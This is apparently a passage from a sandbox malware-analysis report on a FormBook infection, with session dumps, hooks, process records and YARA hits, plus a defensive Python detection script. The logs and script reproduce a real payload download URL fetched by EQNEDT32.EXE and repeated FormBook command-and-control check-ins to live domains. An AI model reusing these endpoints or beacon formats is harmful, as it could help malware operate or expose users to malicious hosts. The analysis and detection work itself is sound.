Nov 14, 2023 13:26:24.701680899 CET | 16 | IN | Data Raw: bc a3 d9 48 bc 08 0a 92 ce aa 95 38 f3 a4 6f 39 84 7c 68 3f f4 6a 89 d8 a3 43 4c cd 00 b0 f9 62 75 30 8f 3a ef 93 ca 58 77 d1 3b bb 7c ed 2c 17 06 c4 55 09 7e ac 48 59 41 ea 47 d4 a1 c4 a3 f8 49 b5 c4 85 60 df 03 b5 30 f8 14 a1 84 22 7e 2a 13 48
                                Data Ascii: H8o9|h?jCLbu0:Xw;|,U~HYAGI`0"~*H4"%DXo$HR/rJ<bGA:W{KJUqG&cdAp-S>?c$W4~aE+~^lrz%N`0a$H"/hNF>m
Nov 14, 2023 13:26:25.127831936 CET | 17 | IN | Data Raw: 84 8e e8 c8 11 e3 2b 15 e2 ba 82 59 42 47 9c 48 29 a7 b6 61 98 9e fc 23 02 dc 3a f0 da 72 1a e1 27 9b 38 3d c5 b7 13 c7 54 b4 9c 96 ed 68 33 ba 15 7e d1 4e bf 48 b3 03 79 77 ba 2f e4 63 10 77 4a dd 49 c4 67 33 12 69 be f8 41 32 92 f5 1a c4 de ed
                                Data Ascii: +YBGH)a#:r'8=Th3~NHyw/cwJIg3iA2P_%E%]9Ra5m6dz1%De;&f'T8)@x#XJ#.Sj\n'.JoDdg]GuhVq|JOa)t#I$2x_Pk


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49164 | 103.224.212.212 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 14, 2023 13:27:01.556895971 CET | 403 | OUT | GET /ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41 HTTP/1.1
                                Host: www.narrativepages.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
Nov 14, 2023 13:27:01.751121998 CET | 404 | IN | HTTP/1.1 302 Found
                                date: Tue, 14 Nov 2023 12:27:01 GMT
                                server: Apache
                                set-cookie: __tad=1699964821.5890023; expires=Fri, 11-Nov-2033 12:27:01 GMT; Max-Age=315360000
                                location: http://ww25.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41&subid1=20231114-2327-010e-8293-af04c239490a
                                content-length: 2
                                content-type: text/html; charset=UTF-8
                                connection: close
                                Data Raw: 0a 0a
                                Data Ascii:

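Sessions 0 and 1 above are the two HTTP behaviours worth a detection rule in this capture: the Equation Editor helper EQNEDT32.EXE fetching a PE over plain HTTP with a stock Internet Explorer User-Agent, and the check-in sent from the injected explorer.exe, a GET to /ge06/ with two query parameters, only Host and "Connection: close" as headers, no User-Agent, and seven NUL bytes as the body. The script below is an added example written for this page; it is not code from the Joe Sandbox report or from any vendor. It re-creates the two requests from the session data as constructed input, adds one ordinary browser request as a control, and runs both rules over them. The regular expression is an assumption: it is deliberately loose on path and key lengths because those vary between FormBook builds, and the process-name rule is limited to EQNEDT32.EXE because that is the process the report shows.

```python
"""Detection logic for the two HTTP behaviours seen in the report's sessions:
an Office helper (EQNEDT32.EXE) fetching a PE, and the FormBook check-in
shape sent from the injected explorer.exe."""
import re

# FormBook check-in as seen in sessions 1 and 2:
#   GET /<short path>/?<key>=<base64-like blob>&<key>=<short id>
# Assumption: path and key lengths vary per build, so the classes stay loose.
BEACON_TARGET = re.compile(
    r"^/[A-Za-z0-9]{2,8}/\?"
    r"[A-Za-z0-9]{2,12}=[A-Za-z0-9+/=]{20,}"
    r"&[A-Za-z0-9]{2,12}=[A-Za-z0-9\-]{2,16}$"
)
# The Equation Editor has no legitimate reason to speak HTTP at all.
OFFICE_HELPERS = {"eqnedt32.exe"}


class HttpRequest:
    def __init__(self, process, raw):
        """Parse one raw request (headers + body) as captured on the wire."""
        head, _, body = raw.partition("\r\n\r\n")
        lines = head.split("\r\n")
        self.process = process
        self.request_line = lines[0]
        self.headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            self.headers[name.strip().lower()] = value.strip()
        self.body = body.encode("latin-1")

    @property
    def method_and_target(self):
        parts = self.request_line.split(" ")
        return (parts[0], parts[1]) if len(parts) == 3 else (None, None)


def office_helper_download(req):
    """Any HTTP request issued by EQNEDT32.EXE is suspicious on its own."""
    exe = req.process.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return exe in OFFICE_HELPERS


def formbook_beacon(req):
    """Request-line shape, bare Host + Connection: close, NUL-only body."""
    method, target = req.method_and_target
    if method != "GET" or target is None or not BEACON_TARGET.match(target):
        return False
    if set(req.headers) != {"host", "connection"}:
        return False
    if req.headers["connection"].lower() != "close":
        return False
    # body is a handful of 0x00 bytes and nothing else
    return bool(req.body) and not req.body.strip(b"\x00")


def scan(req):
    """Names of the rules that fire for one request."""
    hits = []
    if office_helper_download(req):
        hits.append("office_helper_download")
    if formbook_beacon(req):
        hits.append("formbook_beacon")
    return hits


# Constructed from the report's sessions 0 and 1, plus one benign control.
SAMPLES = [
    ("C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE",
     "GET /wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exe HTTP/1.1\r\n"
     "Accept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
     "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
     ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\r\n"
     "Host: mail.treeoflifeadventures.com\r\nConnection: Keep-Alive\r\n\r\n"),
    ("C:\\Windows\\explorer.exe",
     "GET /ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41 HTTP/1.1\r\n"
     "Host: www.narrativepages.com\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe",  # constructed benign control
     "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n"
     "Connection: keep-alive\r\n\r\n"),
]

if __name__ == "__main__":
    for process, raw in SAMPLES:
        req = HttpRequest(process, raw)
        print(f"{process.rsplit(chr(92), 1)[-1]:14} {req.request_line[:60]:60} {scan(req)}")
```

The beacon rule keys on the combination rather than on any single field: the query shape alone would match some tracking pixels, and a missing User-Agent alone matches plenty of scripted clients, but a GET with exactly those two headers, "Connection: close", and a NUL-only body is specific enough to page on. Note that the process name is not part of the rule, since the injected host varies between runs; it is recorded for triage instead.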

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49166 | 91.195.240.19 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 14, 2023 13:28:02.320327997 CET | 405 | OUT | GET /ge06/?6l58L2=rR7wD3U/ZV6dBjvSlK9KatPYfQs2u0cQXMzY4PO5wsCIJRW7frAjgDUNgmxBJMGJ1YneTQ==&BL3=KP-PB41 HTTP/1.1
                                Host: www.luxpsy.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
Nov 14, 2023 13:28:02.687213898 CET | 407 | IN | HTTP/1.1 200 OK
                                date: Tue, 14 Nov 2023 12:28:02 GMT
                                content-type: text/html; charset=UTF-8
                                transfer-encoding: chunked
                                vary: Accept-Encoding
                                x-powered-by: PHP/8.1.17
                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                pragma: no-cache
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EfqE9+XgsPeY0lt8fmJCcevpQEArfAW6hkYNc948X7A9WnL7z7gTBDJenGdvd81ElZXhQnPSPvnXhX6qVpD73g==
                                last-modified: Tue, 14 Nov 2023 12:28:02 GMT
                                x-cache-miss-from: parking-698fb476bf-mbx66
                                server: NginX
                                connection: close
                                Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 45 66 71 45 39 2b 58 67 73 50 65 59 30 6c 74 38 66 6d 4a 43 63 65 76 70 51 45 41 72 66 41 57 36 68 6b 59 4e 63 39 34 38 58 37 41 39 57 6e 4c 37 7a 37 67 54 42 44 4a 65 6e 47 64 76 64 38 31 45 6c 5a 58 68 51 6e 50 53 50 76 6e 58 68 58 36 71 56 70 44 37 33 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 75 78 70 73 79 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 75 78 70 73 79 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 75 78 70 73 79 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20
                                Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EfqE9+XgsPeY0lt8fmJCcevpQEArfAW6hkYNc948X7A9WnL7z7gTBDJenGdvd81ElZXhQnPSPvnXhX6qVpD73g==><head><meta charset="utf-8"><title>luxpsy.com&nbsp;-&nbsp;luxpsy Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="luxpsy.com is your first and best source for all of the information youre looking for. From general topics
Nov 14, 2023 13:28:02.687242031 CET | 408 | IN | Data Raw: 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 75 78 70 73 79 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20
                                Data Ascii: to more of what you would expect to find here, luxpsy.com has it all. We hope you find what you are searchiAECng for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><
Nov 14, 2023 13:28:02.687256098 CET | 409 | IN | Data Raw: 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67
                                Data Ascii: tgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-
Nov 14, 2023 13:28:02.687268972 CET | 410 | IN | Data Raw: 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23
                                Data Ascii: t-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__c
Nov 14, 2023 13:28:02.687280893 CET | 412 | IN | Data Raw: 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74
                                Data Ascii: ntainer-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color
Nov 14, 2023 13:28:02.687293053 CET | 413 | IN | Data Raw: 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a
                                Data Ascii: ansition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-m
Nov 14, 2023 13:28:02.687308073 CET | 414 | IN | Data Raw: 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63
                                Data Ascii: #fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;wid
Nov 14, 2023 13:28:02.687319994 CET | 415 | IN | Data Raw: 43 41 41 0d 0a 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77
                                Data Ascii: CAAus:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translat
                                Nov 14, 2023 13:28:02.687330961 CET416INData Raw: 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2d 63 75 72 76 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72
                                Data Ascii: ackground:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-ind
                                Nov 14, 2023 13:28:02.687644005 CET418INData Raw: 30 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b
                                Data Ascii: 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:u
                                Nov 14, 2023 13:28:02.993742943 CET419INData Raw: 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 20 73 70 61 6e 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 65 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a
                                Data Ascii: gn:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"luxpsy.com","domainName":"luxpsy.com","


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                3 | 192.168.2.22 | 49167 | 38.11.36.68 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 14, 2023 13:28:23.777817965 CET | 431 | OUT | GET /ge06/?6l58L2=0+Pk4QqMeOZthSuOlE3hLercqAjKj7AZkI6NQZ8fzlVSI648NH9aZsaxoIAU5h7921vkYw==&BL3=KP-PB41 HTTP/1.1
                                Host: www.sxchenggu.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                4 | 192.168.2.22 | 49168 | 3.33.130.190 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 14, 2023 13:28:45.165462017 CET | 431 | OUT | GET /ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41 HTTP/1.1
                                Host: www.centralngs.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 14, 2023 13:28:45.382431030 CET | 432 | IN | HTTP/1.1 403 Forbidden
                                Server: openresty
                                Date: Tue, 14 Nov 2023 12:28:45 GMT
                                Content-Type: text/html
                                Content-Length: 150
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                5 | 192.168.2.22 | 49169 | 34.149.87.45 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 14, 2023 13:29:05.883658886 CET | 433 | OUT | GET /ge06/?6l58L2=0AfOVuqZSJfRN5GiS/+VmpnTwyRml/2OLwKSVYenXKtwNMi61Jg0OdgGHf2AFfl8gIxxQw==&BL3=KP-PB41 HTTP/1.1
                                Host: www.west-paws.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 14, 2023 13:29:06.066524982 CET | 433 | IN | HTTP/1.1 429 Too Many Requests
                                Content-Length: 0
                                Accept-Ranges: bytes
                                Date: Tue, 14 Nov 2023 12:29:05 GMT
                                X-Served-By: cache-bfi-krnt7300100-BFI
                                X-Cache: MISS
                                X-Seen-By: yvSunuo/8ld62ehjr5B7kA==
                                Via: 1.1 google
                                Connection: close


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                6 | 192.168.2.22 | 49170 | 206.188.193.211 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 14, 2023 13:29:47.675930977 CET | 434 | OUT | GET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1
                                Host: www.miamirealestatecommercial.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 14, 2023 13:29:50.687489986 CET | 434 | OUT | GET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1
                                Host: www.miamirealestatecommercial.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Code Manipulations

                                Function Name | Hook Type | Active in Processes
                                PeekMessageA | INLINE | explorer.exe
                                PeekMessageW | INLINE | explorer.exe
                                GetMessageW | INLINE | explorer.exe
                                GetMessageA | INLINE | explorer.exe
                                Function Name | Hook Type | New Data
                                PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE8
                                PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE8
                                GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE8
                                GetMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE8


                                Target ID:0
                                Start time:13:26:01
                                Start date:14/11/2023
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x13f500000
                                File size:28'253'536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:2
                                Start time:13:26:20
                                Start date:14/11/2023
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                Imagebase:0x400000
                                File size:543'304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:13:26:25
                                Start date:14/11/2023
                                Path:C:\Users\user\AppData\Roaming\word.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\word.exe
                                Imagebase:0x400000
                                File size:400'516 bytes
                                MD5 hash:AFFC03992E31B5D4324B41CBD40D911E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:13:26:25
                                Start date:14/11/2023
                                Path:C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
                                Imagebase:0x400000
                                File size:265'216 bytes
                                MD5 hash:CF92A3EC74E407574A58BCF121BEC4F1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                Reputation:low
                                Has exited:true

                                Target ID:7
                                Start time:13:26:26
                                Start date:14/11/2023
                                Path:C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
                                Imagebase:0x400000
                                File size:265'216 bytes
                                MD5 hash:CF92A3EC74E407574A58BCF121BEC4F1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
